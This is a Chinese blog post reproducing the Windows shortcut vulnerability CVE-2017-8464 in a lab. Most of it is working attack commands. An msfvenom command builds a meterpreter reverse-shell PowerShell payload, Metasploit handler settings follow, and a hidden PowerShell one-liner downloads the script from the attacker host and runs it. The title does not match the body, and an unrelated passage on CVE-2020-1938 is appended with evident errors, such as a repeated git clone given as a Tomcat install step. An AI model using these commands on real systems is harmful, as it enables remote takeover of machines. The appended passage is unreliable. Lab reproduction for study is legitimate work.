ubuntu自动获取ip地址的命令_CVE-2017-8464远程命令执行漏洞复现

7056992fae9bbe5d64c541cc5ef0144d.png

闲来没事翻翻漏洞复现的进程,哎。。。这个漏洞复现还是做了吧,当作自己的笔记与大家分享一下,其实网上有许多这样的文章,本小白只是打着学习漏洞原理来进行漏洞复现。

CVE-2017-8464的漏洞:官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。这个漏洞影响的版本其实挺多的。

可以远程利用的漏洞版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1

服务器系统

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

实验环境:

攻击机:Ubuntu

IP地址:192.168.205.138

靶机: Microsoft Windows Server 2008

IP地址:192.168.205.135

注明一下:本打算使用kali2.0作为攻击机,由于出了点小状况,故使用乌班图虚机作为攻击机。

话不多说,拿起工具开始干:

首先,我们现在乌班图虚机中创建一个shell,名称为cmdback.ps1:

执行命令msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.205.138 lport=6666 -f psh-reflection>cmdback.ps1,在网站目录下生成了一个cmdback.ps1的文件:

3fead599b859841afeb5b099bd63ce87.png

访问乌班图中生成的shell文件:

b5eafb60592902b04fb5cc0702b370be.png

启动msf进行设置反弹参数信息:

(1)、输入命令进入 use exploit/multi/handler

指定本机IP set LHOST 192.168.205.138

指定端口 set LPORT 6666

设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp

5e519e33cb5d2eab891206061c9c4730.png

上述工作做完之后,在靶机上面创建posershell.exe的快捷键:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.205.138/cmdback.ps1');test.ps1"

e242fe404412954040c4d5fdd6b95fea.png

点击下一步,生成的*.exe文件:

8b6dce0f4cd973fe5811df68c3e401fd.png

93d574135c0316b6e17106a64d1fa8af.png
生成的快捷键

最后我们在攻击机上面输入exploit ,同时在靶机上面运行powershell.exe快捷键:

138d79397a50dd2cc96d406b08da5e93.png
已经获取到靶机的shell

输入shell,成功获取目标主机的权限:

e7c31f6cb93ff00b42ff06aaba88dfb2.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作: 1. 下载POC:可以使用以下命令下载POC文件: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上搭建环境:确保攻击机上已经安装了Tomcat服务器,并且版本在3.4.3以下,可以使用以下命令下载并安装Tomcat 3.4.3版本: git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 3. 配置Tomcat服务器:在Tomcat安装目录下,找到server.xml文件,在<Connector>标签中添加以下内容: protocol="org.apache.coyote.ajp.AjpNio2Protocol" secretRequired="false" 4. 启动Tomcat服务器:在Tomcat安装目录下运行启动脚本,如./catalina.sh run 5. 漏洞:使用以下命令触发漏洞: python3 file_include.py -u http://目标IP:目标端口/ -p /WEB-INF/web.xml 以上步骤可以帮助你Tomact_CVE-2020-1938漏洞。请注意,在进行漏洞时务必遵守道德规范,并获得合法授权进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [CVE-2020-1938 漏洞](https://blog.csdn.net/weixin_48799157/article/details/124889366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [CVE-2020-1938 Tomcat文件包含漏洞](https://blog.csdn.net/qq_49279082/article/details/129018726)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值